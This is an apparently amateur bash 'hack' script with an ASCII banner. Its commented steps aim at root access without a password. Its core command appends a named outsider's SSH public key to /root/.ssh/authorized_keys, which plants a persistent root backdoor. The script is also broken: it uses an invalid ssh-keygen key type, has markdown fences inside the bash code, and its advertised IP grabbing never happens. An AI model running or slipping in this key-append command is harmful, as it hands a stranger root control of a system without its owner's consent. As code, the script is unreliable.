#!/bin/bash
# "#!" called as a shebang or sharp Bang.
echo "hack!"
echo "++++++IP Grabbing from ifconfig+++++++"
echo "  ########  #######   ########  "
echo "     ##     ##    #      ##     "
echo "     ##     ## ###       ##     "
echo "     ##     ##    #      ##     "
echo "     ##     #######      ##     "
echo "-------------------------------------"

# Granting permission and getting access to the root privillages without root password using ssh public and private key.

# Creating a RSA key
```
$ ssh-keygen -t id_rsa
```

```
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3i4q1GqjA5Jg/Lr6axC2pjQBQ42I6ikBIWJyof+sLtOt/WzmEydeI9o0dIj1Tn7bFrCNdXjmIT/y8qW1p50QZ5xZ5pYRYmiFU26Ok
AjR5axJXPtXaVHDsryXly6OJSxXDCQwniwHpfMYMLsDo2ZzCyKXbaPzCM1oq//x6Dh8H8C74FmByvjLOmKA2oY0NnFEHMmoHjoRPVBVU6hi8rbvNv9NgT/fk4w+bC2hYnGmBtYm1jf4S7Y+eQIBk
6uu9qijlU23MkglpFMhWG8Do+V90+1hiIlKuzpKx0lvvnlW4VUOiWAprq6dPE1qtQdRIGxrchvpZLBIhswNSulFz2ALGxrpr1Reb9Zs4mQX1OUGaBAt+Ae6ChLfefUP8ExxRBoout0b2s/34a5Td
6dTMMd9Qjcg3HuBRwmHawAN9ypIJyuTt3UxNUikiuJEF9uptUKJ89XOfTUFxEZK9KzMQ67SmpDnQSGZ9RPLqFzjKnKEztkpi6Wx98ehDypNioECVpYU= theblackthreat@theblackthreat" 
>> /root/.ssh/authorized_keys
```
